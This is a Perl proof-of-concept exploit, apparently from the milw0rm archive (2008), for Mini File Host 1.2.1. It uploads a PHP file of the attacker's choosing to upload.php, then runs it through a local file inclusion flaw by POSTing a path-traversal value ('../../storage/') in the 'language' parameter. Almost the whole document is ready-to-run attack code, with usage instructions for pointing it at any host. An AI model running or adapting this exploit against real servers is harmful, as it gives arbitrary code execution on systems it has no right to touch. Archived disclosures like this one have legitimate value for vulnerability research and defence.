#!/usr/bin/perl
# Name: Mini File Host (1.2.1 "Security Fixed release" and earlier)
# Vulnerability type: Local File Inclusion through POST requests (pages/upload.php)
# Authors: 
#          Scary-Boys: original GET-vulnerability, 2008-01-17
#             shinmai: POST-request vulnerability in latest version
#                      perl POC, 2008-01-19
######################################################################################
# Description:
# The same language=LFI vulnerability is found in 1.2 is present in  thelatest version
# POST has to be used to exploit instead of GET.
#
# This POC is to be used as follows:
# perl mfh121.pl -f FILENAME.PHP -h HOSTNAME -e PATH TO MFH
#
# FILENAME.PHP is uploaded to the target script, and then executed through LFI with
# a POST request.
#
# example: perl mfh121.pl -f ./phpinfo.php -h localhost -p /mfi121/ | less
# The resulting HTML will be printed, all output by phpinfo.php will be before the
# real content.
#
use LWP::UserAgent;
use Getopt::Std;
use vars qw($opt_f $opt_h $opt_p $opt_g);

my $ua;
my $response;
my $formtarget;
my $original_filename;
my $filame;
my $scriptname;
my $exploit_target;

getopts("f:h:p:g");

$original_filename = $opt_f;
$filame = chomp($original_filename);
$formtarget = "http://".$opt_h.$opt_p."upload.php?do=verify";

$ua = LWP::UserAgent->new;

$response = $ua->post( $formtarget,
  [ 'upfile' => [$original_filename], ],
  'Content_Type' => 'form-data'
);

die "error: ", $response->status_line
   unless $response->is_success;
if( $response->content =~ m/\.php\?file=(.*?)\">/ ) {
    $scriptname = "$1";
  } else {
    print "Upload of php file unsuccessful";
    die ($response->status_line);
  }

$scriptname =~ s/\.[\w]{2,4}//;

$exploit_target = "http://".$opt_h.$opt_p."/pages/upload.php";
$response = $ua->post( $exploit_target,
  [ 'language' => "../../storage/".$scriptname, ],
  'Content_Type' => 'form-data'
);
die "error running php file though LFI: ", $response->status_line
   unless $response->is_success;
print $response->content;

exit(0);

# milw0rm.com [2008-01-20]
